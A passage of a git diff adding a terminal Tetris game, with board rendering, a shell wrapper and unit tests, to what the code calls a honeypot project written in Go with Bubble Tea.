|
b.WriteString(borderStyle.Render("+" + strings.Repeat("--", boardCols) + "+"))
|
||||||
|
|
||||||
|
return b.String()
|
||||||
|
}
|
||||||
|
|
||||||
|
// renderNextPiece renders the "next piece" preview box.
|
||||||
|
func renderNextPiece(pt pieceType) string {
|
||||||
|
shape := pieces[pt][0]
|
||||||
|
// Determine bounding box.
|
||||||
|
minR, maxR := shape[0][0], shape[0][0]
|
||||||
|
minC, maxC := shape[0][1], shape[0][1]
|
||||||
|
for _, off := range shape {
|
||||||
|
if off[0] < minR {
|
||||||
|
minR = off[0]
|
||||||
|
}
|
||||||
|
if off[0] > maxR {
|
||||||
|
maxR = off[0]
|
||||||
|
}
|
||||||
|
if off[1] < minC {
|
||||||
|
minC = off[1]
|
||||||
|
}
|
||||||
|
if off[1] > maxC {
|
||||||
|
maxC = off[1]
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
rows := maxR - minR + 1
|
||||||
|
cols := maxC - minC + 1
|
||||||
|
|
||||||
|
// Build a small grid.
|
||||||
|
grid := make([][]bool, rows)
|
||||||
|
for i := range grid {
|
||||||
|
grid[i] = make([]bool, cols)
|
||||||
|
}
|
||||||
|
for _, off := range shape {
|
||||||
|
grid[off[0]-minR][off[1]-minC] = true
|
||||||
|
}
|
||||||
|
|
||||||
|
var b strings.Builder
|
||||||
|
boxWidth := 8 // chars for the box interior
|
||||||
|
b.WriteString(dimStyle.Render("+" + strings.Repeat("-", boxWidth) + "+"))
|
||||||
|
b.WriteString("\n")
|
||||||
|
|
||||||
|
for r := range rows {
|
||||||
|
b.WriteString(dimStyle.Render("|"))
|
||||||
|
// Center the piece in the box.
|
||||||
|
pieceWidth := cols * 2
|
||||||
|
leftPad := (boxWidth - pieceWidth) / 2
|
||||||
|
rightPad := boxWidth - pieceWidth - leftPad
|
||||||
|
b.WriteString(baseStyle.Render(strings.Repeat(" ", leftPad)))
|
||||||
|
for c := range cols {
|
||||||
|
if grid[r][c] {
|
||||||
|
b.WriteString(cellStyle(pt).Render("[]"))
|
||||||
|
} else {
|
||||||
|
b.WriteString(baseStyle.Render(" "))
|
||||||
|
}
|
||||||
|
}
|
||||||
|
b.WriteString(baseStyle.Render(strings.Repeat(" ", rightPad)))
|
||||||
|
b.WriteString(dimStyle.Render("|"))
|
||||||
|
b.WriteString("\n")
|
||||||
|
}
|
||||||
|
|
||||||
|
// Fill remaining rows in the box (max 4 rows for I piece).
|
||||||
|
for r := rows; r < 2; r++ {
|
||||||
|
b.WriteString(dimStyle.Render("|"))
|
||||||
|
b.WriteString(baseStyle.Render(strings.Repeat(" ", boxWidth)))
|
||||||
|
b.WriteString(dimStyle.Render("|"))
|
||||||
|
b.WriteString("\n")
|
||||||
|
}
|
||||||
|
|
||||||
|
b.WriteString(dimStyle.Render("+" + strings.Repeat("-", boxWidth) + "+"))
|
||||||
|
return b.String()
|
||||||
|
}
|
||||||
|
|
||||||
|
// formatScore formats a score with comma separators.
|
||||||
|
func formatScore(n int) string {
|
||||||
|
s := fmt.Sprintf("%d", n)
|
||||||
|
if len(s) <= 3 {
|
||||||
|
return s
|
||||||
|
}
|
||||||
|
var parts []string
|
||||||
|
for len(s) > 3 {
|
||||||
|
parts = append([]string{s[len(s)-3:]}, parts...)
|
||||||
|
s = s[:len(s)-3]
|
||||||
|
}
|
||||||
|
parts = append([]string{s}, parts...)
|
||||||
|
return strings.Join(parts, ",")
|
||||||
|
}
|
||||||
|
|
||||||
|
// gameView combines the board and sidebar into the game screen.
|
||||||
|
func gameView(g *gameState) string {
|
||||||
|
boardStr := renderBoard(g)
|
||||||
|
boardLines := strings.Split(boardStr, "\n")
|
||||||
|
|
||||||
|
nextStr := renderNextPiece(g.next)
|
||||||
|
nextLines := strings.Split(nextStr, "\n")
|
||||||
|
|
||||||
|
// Build sidebar lines.
|
||||||
|
var sidebar []string
|
||||||
|
sidebar = append(sidebar, sidebarLabelStyle.Render(" NEXT:"))
|
||||||
|
sidebar = append(sidebar, nextLines...)
|
||||||
|
sidebar = append(sidebar, "")
|
||||||
|
sidebar = append(sidebar, sidebarLabelStyle.Render(" SCORE: ")+sidebarValueStyle.Render(formatScore(g.score)))
|
||||||
|
sidebar = append(sidebar, sidebarLabelStyle.Render(" LEVEL: ")+sidebarValueStyle.Render(fmt.Sprintf("%d", g.level)))
|
||||||
|
sidebar = append(sidebar, sidebarLabelStyle.Render(" LINES: ")+sidebarValueStyle.Render(fmt.Sprintf("%d", g.lines)))
|
||||||
|
sidebar = append(sidebar, "")
|
||||||
|
sidebar = append(sidebar, dimStyle.Render(" Controls:"))
|
||||||
|
sidebar = append(sidebar, dimStyle.Render(" <- -> Move"))
|
||||||
|
sidebar = append(sidebar, dimStyle.Render(" Up/Z Rotate"))
|
||||||
|
sidebar = append(sidebar, dimStyle.Render(" Down Soft drop"))
|
||||||
|
sidebar = append(sidebar, dimStyle.Render(" Space Hard drop"))
|
||||||
|
sidebar = append(sidebar, dimStyle.Render(" Q Quit"))
|
||||||
|
|
||||||
|
// Combine board and sidebar side by side.
|
||||||
|
var b strings.Builder
|
||||||
|
maxLines := max(len(boardLines), len(sidebar))
|
||||||
|
|
||||||
|
for i := range maxLines {
|
||||||
|
boardLine := ""
|
||||||
|
if i < len(boardLines) {
|
||||||
|
boardLine = boardLines[i]
|
||||||
|
}
|
||||||
|
sidebarLine := ""
|
||||||
|
if i < len(sidebar) {
|
||||||
|
sidebarLine = sidebar[i]
|
||||||
|
}
|
||||||
|
|
||||||
|
// Pad board to fixed width (| + 10*2 + | = 22 chars visual).
|
||||||
|
b.WriteString(boardLine)
|
||||||
|
b.WriteString(sidebarLine)
|
||||||
|
b.WriteString("\n")
|
||||||
|
}
|
||||||
|
|
||||||
|
return b.String()
|
||||||
|
}
|
||||||
|
|
||||||
|
// padLine pads a single line to termWidth.
|
||||||
|
func padLine(line string) string {
|
||||||
|
w := lipgloss.Width(line)
|
||||||
|
if w >= termWidth {
|
||||||
|
return line
|
||||||
|
}
|
||||||
|
return line + baseStyle.Render(strings.Repeat(" ", termWidth-w))
|
||||||
|
}
|
||||||
|
|
||||||
|
// padLines pads every line in a multi-line string to termWidth.
|
||||||
|
func padLines(s string) string {
|
||||||
|
lines := strings.Split(s, "\n")
|
||||||
|
for i, line := range lines {
|
||||||
|
lines[i] = padLine(line)
|
||||||
|
}
|
||||||
|
return strings.Join(lines, "\n")
|
||||||
|
}
|
||||||
|
|
||||||
|
// gameFrame wraps content with padding to fill the terminal.
|
||||||
|
func gameFrame(content string, height int) string {
|
||||||
|
var b strings.Builder
|
||||||
|
b.WriteString(content)
|
||||||
|
|
||||||
|
// Pad with blank lines to fill terminal height.
|
||||||
|
if height > 0 {
|
||||||
|
contentLines := strings.Count(content, "\n") + 1
|
||||||
|
blankLine := baseStyle.Render(strings.Repeat(" ", termWidth))
|
||||||
|
for i := contentLines; i < height; i++ {
|
||||||
|
b.WriteString(blankLine)
|
||||||
|
b.WriteString("\n")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
return padLines(b.String())
|
||||||
|
}
|
||||||
66
internal/shell/tetris/tetris.go
Normal file
66
internal/shell/tetris/tetris.go
Normal file
@@ -0,0 +1,66 @@
|
|||||||
|
package tetris
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"io"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
tea "github.com/charmbracelet/bubbletea"
|
||||||
|
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/shell"
|
||||||
|
)
|
||||||
|
|
||||||
|
const sessionTimeout = 10 * time.Minute
|
||||||
|
|
||||||
|
// TetrisShell is a Tetris game TUI for the honeypot.
|
||||||
|
type TetrisShell struct{}
|
||||||
|
|
||||||
|
// NewTetrisShell returns a new TetrisShell instance.
|
||||||
|
func NewTetrisShell() *TetrisShell {
|
||||||
|
return &TetrisShell{}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (t *TetrisShell) Name() string { return "tetris" }
|
||||||
|
func (t *TetrisShell) Description() string { return "Tetris game TUI" }
|
||||||
|
|
||||||
|
func (t *TetrisShell) Handle(ctx context.Context, sess *shell.SessionContext, rw io.ReadWriteCloser) error {
|
||||||
|
ctx, cancel := context.WithTimeout(ctx, sessionTimeout)
|
||||||
|
defer cancel()
|
||||||
|
|
||||||
|
difficulty := configString(sess.ShellConfig, "difficulty", "normal")
|
||||||
|
|
||||||
|
m := newModel(sess, difficulty)
|
||||||
|
p := tea.NewProgram(m,
|
||||||
|
tea.WithInput(rw),
|
||||||
|
tea.WithOutput(rw),
|
||||||
|
tea.WithAltScreen(),
|
||||||
|
)
|
||||||
|
|
||||||
|
done := make(chan error, 1)
|
||||||
|
go func() {
|
||||||
|
_, err := p.Run()
|
||||||
|
done <- err
|
||||||
|
}()
|
||||||
|
|
||||||
|
select {
|
||||||
|
case err := <-done:
|
||||||
|
return err
|
||||||
|
case <-ctx.Done():
|
||||||
|
p.Quit()
|
||||||
|
<-done
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// configString reads a string from the shell config map with a default.
|
||||||
|
func configString(cfg map[string]any, key, defaultVal string) string {
|
||||||
|
if cfg == nil {
|
||||||
|
return defaultVal
|
||||||
|
}
|
||||||
|
if v, ok := cfg[key]; ok {
|
||||||
|
if s, ok := v.(string); ok && s != "" {
|
||||||
|
return s
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return defaultVal
|
||||||
|
}
|
||||||
582
internal/shell/tetris/tetris_test.go
Normal file
582
internal/shell/tetris/tetris_test.go
Normal file
@@ -0,0 +1,582 @@
|
|||||||
|
package tetris
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"strings"
|
||||||
|
"testing"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
tea "github.com/charmbracelet/bubbletea"
|
||||||
|
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/shell"
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/storage"
|
||||||
|
)
|
||||||
|
|
||||||
|
// newTestModel creates a model with a test session context.
|
||||||
|
func newTestModel(t *testing.T) (*model, *storage.MemoryStore) {
|
||||||
|
t.Helper()
|
||||||
|
store := storage.NewMemoryStore()
|
||||||
|
sessID, _ := store.CreateSession(context.Background(), "127.0.0.1", "player", "tetris", "")
|
||||||
|
sess := &shell.SessionContext{
|
||||||
|
SessionID: sessID,
|
||||||
|
Username: "player",
|
||||||
|
Store: store,
|
||||||
|
}
|
||||||
|
m := newModel(sess, "normal")
|
||||||
|
return m, store
|
||||||
|
}
|
||||||
|
|
||||||
|
// sendKey sends a single key message to the model and returns the command.
|
||||||
|
func sendKey(m *model, key string) tea.Cmd {
|
||||||
|
var msg tea.KeyMsg
|
||||||
|
switch key {
|
||||||
|
case "enter":
|
||||||
|
msg = tea.KeyMsg{Type: tea.KeyEnter}
|
||||||
|
case "up":
|
||||||
|
msg = tea.KeyMsg{Type: tea.KeyUp}
|
||||||
|
case "down":
|
||||||
|
msg = tea.KeyMsg{Type: tea.KeyDown}
|
||||||
|
case "left":
|
||||||
|
msg = tea.KeyMsg{Type: tea.KeyLeft}
|
||||||
|
case "right":
|
||||||
|
msg = tea.KeyMsg{Type: tea.KeyRight}
|
||||||
|
case "space":
|
||||||
|
msg = tea.KeyMsg{Type: tea.KeySpace}
|
||||||
|
case "ctrl+c":
|
||||||
|
msg = tea.KeyMsg{Type: tea.KeyCtrlC}
|
||||||
|
default:
|
||||||
|
if len(key) == 1 {
|
||||||
|
msg = tea.KeyMsg{Type: tea.KeyRunes, Runes: []rune(key)}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
_, cmd := m.Update(msg)
|
||||||
|
return cmd
|
||||||
|
}
|
||||||
|
|
||||||
|
// sendTick sends a tick message to the model.
|
||||||
|
func sendTick(m *model) tea.Cmd {
|
||||||
|
_, cmd := m.Update(tickMsg(time.Now()))
|
||||||
|
return cmd
|
||||||
|
}
|
||||||
|
|
||||||
|
// execCmds recursively executes tea.Cmd functions (including batches).
|
||||||
|
func execCmds(cmd tea.Cmd) {
|
||||||
|
if cmd == nil {
|
||||||
|
return
|
||||||
|
}
|
||||||
|
msg := cmd()
|
||||||
|
if batch, ok := msg.(tea.BatchMsg); ok {
|
||||||
|
for _, c := range batch {
|
||||||
|
execCmds(c)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestTetrisShellName(t *testing.T) {
|
||||||
|
sh := NewTetrisShell()
|
||||||
|
if sh.Name() != "tetris" {
|
||||||
|
t.Errorf("Name() = %q, want %q", sh.Name(), "tetris")
|
||||||
|
}
|
||||||
|
if sh.Description() == "" {
|
||||||
|
t.Error("Description() should not be empty")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestConfigString(t *testing.T) {
|
||||||
|
cfg := map[string]any{
|
||||||
|
"difficulty": "hard",
|
||||||
|
}
|
||||||
|
if got := configString(cfg, "difficulty", "normal"); got != "hard" {
|
||||||
|
t.Errorf("configString() = %q, want %q", got, "hard")
|
||||||
|
}
|
||||||
|
if got := configString(cfg, "missing", "normal"); got != "normal" {
|
||||||
|
t.Errorf("configString() = %q, want %q", got, "normal")
|
||||||
|
}
|
||||||
|
if got := configString(nil, "difficulty", "normal"); got != "normal" {
|
||||||
|
t.Errorf("configString(nil) = %q, want %q", got, "normal")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestTitleScreenRenders(t *testing.T) {
|
||||||
|
m, _ := newTestModel(t)
|
||||||
|
view := m.View()
|
||||||
|
if !strings.Contains(view, "████") {
|
||||||
|
t.Error("title screen should show TETRIS logo")
|
||||||
|
}
|
||||||
|
if !strings.Contains(view, "Press any key") {
|
||||||
|
t.Error("title screen should show 'Press any key'")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestTitleToGame(t *testing.T) {
|
||||||
|
m, _ := newTestModel(t)
|
||||||
|
if m.screen != screenTitle {
|
||||||
|
t.Fatalf("expected screenTitle, got %d", m.screen)
|
||||||
|
}
|
||||||
|
|
||||||
|
sendKey(m, "enter")
|
||||||
|
if m.screen != screenGame {
|
||||||
|
t.Errorf("expected screenGame after keypress, got %d", m.screen)
|
||||||
|
}
|
||||||
|
if m.game == nil {
|
||||||
|
t.Fatal("game should be initialized")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestGameRenders(t *testing.T) {
|
||||||
|
m, _ := newTestModel(t)
|
||||||
|
sendKey(m, "enter") // start game
|
||||||
|
|
||||||
|
view := m.View()
|
||||||
|
if !strings.Contains(view, "|") {
|
||||||
|
t.Error("game view should contain board borders")
|
||||||
|
}
|
||||||
|
if !strings.Contains(view, "SCORE") {
|
||||||
|
t.Error("game view should show SCORE")
|
||||||
|
}
|
||||||
|
if !strings.Contains(view, "LEVEL") {
|
||||||
|
t.Error("game view should show LEVEL")
|
||||||
|
}
|
||||||
|
if !strings.Contains(view, "LINES") {
|
||||||
|
t.Error("game view should show LINES")
|
||||||
|
}
|
||||||
|
if !strings.Contains(view, "NEXT") {
|
||||||
|
t.Error("game view should show NEXT")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// --- Pure game logic tests ---
|
||||||
|
|
||||||
|
func TestNewGame(t *testing.T) {
|
||||||
|
g := newGame(0)
|
||||||
|
if g.gameOver {
|
||||||
|
t.Error("new game should not be game over")
|
||||||
|
}
|
||||||
|
if g.score != 0 {
|
||||||
|
t.Errorf("initial score = %d, want 0", g.score)
|
||||||
|
}
|
||||||
|
if g.level != 0 {
|
||||||
|
t.Errorf("initial level = %d, want 0", g.level)
|
||||||
|
}
|
||||||
|
if g.lines != 0 {
|
||||||
|
t.Errorf("initial lines = %d, want 0", g.lines)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestNewGameHardLevel(t *testing.T) {
|
||||||
|
g := newGame(5)
|
||||||
|
if g.level != 5 {
|
||||||
|
t.Errorf("hard start level = %d, want 5", g.level)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestMoveLeft(t *testing.T) {
|
||||||
|
g := newGame(0)
|
||||||
|
startCol := g.currentCol
|
||||||
|
g.moveLeft()
|
||||||
|
if g.currentCol != startCol-1 {
|
||||||
|
t.Errorf("after moveLeft: col = %d, want %d", g.currentCol, startCol-1)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestMoveRight(t *testing.T) {
|
||||||
|
g := newGame(0)
|
||||||
|
startCol := g.currentCol
|
||||||
|
g.moveRight()
|
||||||
|
if g.currentCol != startCol+1 {
|
||||||
|
t.Errorf("after moveRight: col = %d, want %d", g.currentCol, startCol+1)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestMoveDown(t *testing.T) {
|
||||||
|
g := newGame(0)
|
||||||
|
startRow := g.currentRow
|
||||||
|
moved := g.moveDown()
|
||||||
|
if !moved {
|
||||||
|
t.Error("moveDown should succeed from starting position")
|
||||||
|
}
|
||||||
|
if g.currentRow != startRow+1 {
|
||||||
|
t.Errorf("after moveDown: row = %d, want %d", g.currentRow, startRow+1)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCannotMoveLeftBeyondWall(t *testing.T) {
|
||||||
|
g := newGame(0)
|
||||||
|
// Move all the way left.
|
||||||
|
for range boardCols {
|
||||||
|
g.moveLeft()
|
||||||
|
}
|
||||||
|
col := g.currentCol
|
||||||
|
g.moveLeft() // should not move further
|
||||||
|
if g.currentCol != col {
|
||||||
|
t.Errorf("should not move past left wall: col = %d, was %d", g.currentCol, col)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCannotMoveRightBeyondWall(t *testing.T) {
|
||||||
|
g := newGame(0)
|
||||||
|
// Move all the way right.
|
||||||
|
for range boardCols {
|
||||||
|
g.moveRight()
|
||||||
|
}
|
||||||
|
col := g.currentCol
|
||||||
|
g.moveRight() // should not move further
|
||||||
|
if g.currentCol != col {
|
||||||
|
t.Errorf("should not move past right wall: col = %d, was %d", g.currentCol, col)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestRotate(t *testing.T) {
|
||||||
|
g := newGame(0)
|
||||||
|
startRot := g.currentRot
|
||||||
|
g.rotate()
|
||||||
|
// Rotation should change (possibly with wall kick).
|
||||||
|
if g.currentRot == startRot {
|
||||||
|
// Rotation might legitimately fail in some edge cases, so just check
|
||||||
|
// that the game state is valid.
|
||||||
|
if !g.canPlace(g.current, g.currentRot, g.currentRow, g.currentCol) {
|
||||||
|
t.Error("piece should be in a valid position after rotate attempt")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestHardDrop(t *testing.T) {
|
||||||
|
g := newGame(0)
|
||||||
|
startRow := g.currentRow
|
||||||
|
dropped := g.hardDrop()
|
||||||
|
if dropped == 0 {
|
||||||
|
t.Error("hard drop should move piece down at least some rows from top")
|
||||||
|
}
|
||||||
|
if g.currentRow <= startRow {
|
||||||
|
t.Errorf("after hardDrop: row = %d should be > %d", g.currentRow, startRow)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestGhostRow(t *testing.T) {
|
||||||
|
g := newGame(0)
|
||||||
|
ghost := g.ghostRow()
|
||||||
|
if ghost < g.currentRow {
|
||||||
|
t.Errorf("ghost row %d should be >= current row %d", ghost, g.currentRow)
|
||||||
|
}
|
||||||
|
// Ghost should be at a position where moving down one more is impossible.
|
||||||
|
if g.canPlace(g.current, g.currentRot, ghost+1, g.currentCol) {
|
||||||
|
t.Error("ghost row should be the lowest valid position")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestLockPiece(t *testing.T) {
|
||||||
|
g := newGame(0)
|
||||||
|
g.hardDrop()
|
||||||
|
pt := g.current
|
||||||
|
row, col, rot := g.currentRow, g.currentCol, g.currentRot
|
||||||
|
g.lockPiece()
|
||||||
|
|
||||||
|
// Verify that the piece's cells are now filled.
|
||||||
|
shape := pieces[pt][rot]
|
||||||
|
for _, off := range shape {
|
||||||
|
r, c := row+off[0], col+off[1]
|
||||||
|
if !g.board[r][c].filled {
|
||||||
|
t.Errorf("cell (%d, %d) should be filled after lockPiece", r, c)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestClearLines(t *testing.T) {
|
||||||
|
g := newGame(0)
|
||||||
|
// Fill the bottom row completely.
|
||||||
|
for c := range boardCols {
|
||||||
|
g.board[boardRows-1][c] = cell{filled: true, piece: pieceI}
|
||||||
|
}
|
||||||
|
cleared := g.clearLines()
|
||||||
|
if cleared != 1 {
|
||||||
|
t.Errorf("clearLines() = %d, want 1", cleared)
|
||||||
|
}
|
||||||
|
// Bottom row should now be empty (shifted from above).
|
||||||
|
for c := range boardCols {
|
||||||
|
if g.board[boardRows-1][c].filled {
|
||||||
|
t.Errorf("bottom row col %d should be empty after clearing", c)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestClearMultipleLines(t *testing.T) {
|
||||||
|
g := newGame(0)
|
||||||
|
// Fill the bottom 4 rows.
|
||||||
|
for r := boardRows - 4; r < boardRows; r++ {
|
||||||
|
for c := range boardCols {
|
||||||
|
g.board[r][c] = cell{filled: true, piece: pieceI}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
cleared := g.clearLines()
|
||||||
|
if cleared != 4 {
|
||||||
|
t.Errorf("clearLines() = %d, want 4", cleared)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestScoring(t *testing.T) {
|
||||||
|
tests := []struct {
|
||||||
|
lines int
|
||||||
|
level int
|
||||||
|
want int
|
||||||
|
}{
|
||||||
|
{1, 0, 40},
|
||||||
|
{2, 0, 100},
|
||||||
|
{3, 0, 300},
|
||||||
|
{4, 0, 1200},
|
||||||
|
{1, 1, 80},
|
||||||
|
{4, 2, 3600},
|
||||||
|
}
|
||||||
|
for _, tt := range tests {
|
||||||
|
g := newGame(tt.level)
|
||||||
|
g.addScore(tt.lines)
|
||||||
|
if g.score != tt.want {
|
||||||
|
t.Errorf("score for %d lines at level %d = %d, want %d", tt.lines, tt.level, g.score, tt.want)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestLevelUp(t *testing.T) {
|
||||||
|
g := newGame(0)
|
||||||
|
g.lines = 9
|
||||||
|
g.addScore(1) // This should push lines to 10, triggering level 1.
|
||||||
|
if g.level != 1 {
|
||||||
|
t.Errorf("level = %d, want 1 after 10 lines", g.level)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestTickInterval(t *testing.T) {
|
||||||
|
if got := tickInterval(0); got != 800 {
|
||||||
|
t.Errorf("tickInterval(0) = %d, want 800", got)
|
||||||
|
}
|
||||||
|
if got := tickInterval(5); got != 500 {
|
||||||
|
t.Errorf("tickInterval(5) = %d, want 500", got)
|
||||||
|
}
|
||||||
|
// Floor at 100ms.
|
||||||
|
if got := tickInterval(20); got != 100 {
|
||||||
|
t.Errorf("tickInterval(20) = %d, want 100", got)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestFormatScore(t *testing.T) {
|
||||||
|
tests := []struct {
|
||||||
|
n int
|
||||||
|
want string
|
||||||
|
}{
|
||||||
|
{0, "0"},
|
||||||
|
{100, "100"},
|
||||||
|
{1250, "1,250"},
|
||||||
|
{1000000, "1,000,000"},
|
||||||
|
}
|
||||||
|
for _, tt := range tests {
|
||||||
|
if got := formatScore(tt.n); got != tt.want {
|
||||||
|
t.Errorf("formatScore(%d) = %q, want %q", tt.n, got, tt.want)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestGameOverScreen(t *testing.T) {
|
||||||
|
m, _ := newTestModel(t)
|
||||||
|
sendKey(m, "enter") // start game
|
||||||
|
|
||||||
|
// Force game over.
|
||||||
|
m.game.gameOver = true
|
||||||
|
m.screen = screenGameOver
|
||||||
|
|
||||||
|
view := m.View()
|
||||||
|
if !strings.Contains(view, "GAME OVER") {
|
||||||
|
t.Error("game over screen should show GAME OVER")
|
||||||
|
}
|
||||||
|
if !strings.Contains(view, "Score") {
|
||||||
|
t.Error("game over screen should show score")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestRestartFromGameOver(t *testing.T) {
|
||||||
|
m, _ := newTestModel(t)
|
||||||
|
sendKey(m, "enter") // start game
|
||||||
|
|
||||||
|
m.game.gameOver = true
|
||||||
|
m.screen = screenGameOver
|
||||||
|
|
||||||
|
sendKey(m, "r")
|
||||||
|
if m.screen != screenGame {
|
||||||
|
t.Errorf("expected screenGame after restart, got %d", m.screen)
|
||||||
|
}
|
||||||
|
if m.game.gameOver {
|
||||||
|
t.Error("game should not be over after restart")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestQuitFromGame(t *testing.T) {
|
||||||
|
m, _ := newTestModel(t)
|
||||||
|
sendKey(m, "enter") // start game
|
||||||
|
sendKey(m, "q")
|
||||||
|
if !m.quitting {
|
||||||
|
t.Error("should be quitting after pressing q")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestQuitFromGameOver(t *testing.T) {
|
||||||
|
m, _ := newTestModel(t)
|
||||||
|
sendKey(m, "enter") // start game
|
||||||
|
m.game.gameOver = true
|
||||||
|
m.screen = screenGameOver
|
||||||
|
|
||||||
|
sendKey(m, "q")
|
||||||
|
if !m.quitting {
|
||||||
|
t.Error("should be quitting after pressing q in game over")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestSoftDropScoring(t *testing.T) {
|
||||||
|
m, _ := newTestModel(t)
|
||||||
|
sendKey(m, "enter") // start game
|
||||||
|
|
||||||
|
scoreBefore := m.game.score
|
||||||
|
sendKey(m, "down")
|
||||||
|
if m.game.score != scoreBefore+1 {
|
||||||
|
t.Errorf("score after soft drop = %d, want %d", m.game.score, scoreBefore+1)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestHardDropScoring(t *testing.T) {
|
||||||
|
m, _ := newTestModel(t)
|
||||||
|
sendKey(m, "enter") // start game
|
||||||
|
|
||||||
|
// Hard drop gives 2 points per row dropped.
|
||||||
|
sendKey(m, "space")
|
||||||
|
if m.game.score < 2 {
|
||||||
|
t.Errorf("score after hard drop = %d, should be at least 2", m.game.score)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestTickMovesDown(t *testing.T) {
|
||||||
|
m, _ := newTestModel(t)
|
||||||
|
sendKey(m, "enter") // start game
|
||||||
|
|
||||||
|
rowBefore := m.game.currentRow
|
||||||
|
sendTick(m)
|
||||||
|
// Piece should either move down by 1, or lock and spawn a new piece at top.
|
||||||
|
movedDown := m.game.currentRow == rowBefore+1
|
||||||
|
respawned := m.game.currentRow < rowBefore
|
||||||
|
if !movedDown && !respawned && !m.game.gameOver {
|
||||||
|
t.Errorf("tick should move piece down or lock+respawn: row was %d, now %d", rowBefore, m.game.currentRow)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestSessionLogs(t *testing.T) {
|
||||||
|
m, store := newTestModel(t)
|
||||||
|
|
||||||
|
// Press key to start game — returns a logAction cmd.
|
||||||
|
cmd := sendKey(m, "enter")
|
||||||
|
if cmd != nil {
|
||||||
|
execCmds(cmd)
|
||||||
|
}
|
||||||
|
time.Sleep(50 * time.Millisecond)
|
||||||
|
|
||||||
|
found := false
|
||||||
|
for _, log := range store.SessionLogs {
|
||||||
|
if strings.Contains(log.Input, "GAME START") {
|
||||||
|
found = true
|
||||||
|
break
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if !found {
|
||||||
|
t.Error("expected GAME START in session logs")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestKeypressCounter(t *testing.T) {
|
||||||
|
m, _ := newTestModel(t)
|
||||||
|
sendKey(m, "enter") // start game
|
||||||
|
sendKey(m, "left")
|
||||||
|
sendKey(m, "right")
|
||||||
|
sendKey(m, "down")
|
||||||
|
|
||||||
|
if m.keypresses != 4 { // enter + 3 game keys
|
||||||
|
t.Errorf("keypresses = %d, want 4", m.keypresses)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestLockDelay(t *testing.T) {
|
||||||
|
m, _ := newTestModel(t)
|
||||||
|
sendKey(m, "enter") // start game
|
||||||
|
|
||||||
|
// Drop piece to the bottom via ticks until it can't move down.
|
||||||
|
for range boardRows + 5 {
|
||||||
|
if m.locking {
|
||||||
|
break
|
||||||
|
}
|
||||||
|
sendTick(m)
|
||||||
|
}
|
||||||
|
|
||||||
|
if !m.locking {
|
||||||
|
t.Fatal("piece should be in locking state after hitting bottom")
|
||||||
|
}
|
||||||
|
|
||||||
|
// During lock delay, we should still be able to move left/right.
|
||||||
|
colBefore := m.game.currentCol
|
||||||
|
sendKey(m, "left")
|
||||||
|
if m.game.currentCol >= colBefore {
|
||||||
|
// Might not have moved if against wall, try right.
|
||||||
|
sendKey(m, "right")
|
||||||
|
}
|
||||||
|
|
||||||
|
// Sending a lockMsg should finalize the piece.
|
||||||
|
m.Update(lockMsg(time.Now()))
|
||||||
|
// After lock, a new piece should have spawned (row near top).
|
||||||
|
if m.game.currentRow > 1 && !m.game.gameOver {
|
||||||
|
t.Errorf("after lock delay, new piece should spawn near top, got row %d", m.game.currentRow)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestLockDelayCancelledByDrop(t *testing.T) {
|
||||||
|
